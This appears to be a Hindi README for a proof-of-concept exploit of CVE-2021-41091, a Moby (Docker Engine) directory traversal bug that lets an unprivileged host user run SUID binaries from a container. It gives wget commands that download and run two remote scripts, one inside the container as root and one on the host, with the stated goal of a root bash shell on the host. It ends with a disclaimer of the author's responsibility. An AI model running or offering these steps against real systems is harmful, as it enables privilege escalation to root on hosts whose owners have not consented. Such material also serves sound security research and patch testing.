
CVE-2021-41091 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण: Moby (Docker Engine) निर्देशिका ट्रैवर्सल जो अनपेक्षित उपयोगकर्ताओं को होस्ट पर कंटेनर से SUID बाइनरी निष्पादित करने की अनुमति देता है। Ubuntu 20.04 के लिए PoC स्क्रिप्ट शामिल हैं।
Moby (Docker Engine) में एक बग अनुमति रहित उपयोगकर्ताओं को निर्देशिकाओं को पार करने और डॉकर से सीधे मुख्य मशीन पर प्रोग्राम निष्पादित करने की अनुमति देता है, यदि डॉकर में एक suid प्रोग्राम मौजूद है तो उपयोगकर्ता इसे मुख्य मशीन पर suid के रूप में निष्पादित कर सकता है
कंटेनर के टर्मिनल में हम docker.sh फ़ाइल डाउनलोड करते हैं, फिर इसे रूट उपयोगकर्ता के रूप में निष्पादित करते हैं:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
अब मुख्य मशीन पर हम principal.sh फ़ाइल डाउनलोड करते हैं और इसे निष्पादित करते हैं:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
हम वह कमांड निष्पादित करते हैं जो फ़ाइल हमें देगा और हम /bin/bash को रूट के रूप में निष्पादित करने में सक्षम होंगे
ये स्क्रिप्ट Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) पर Moby 20.10.5+dfsg1 संस्करण के साथ परीक्षण की गई थीं
इस रिपॉजिटरी का उपयोग उपयोगकर्ता की जिम्मेदारी है, लेखक की नहीं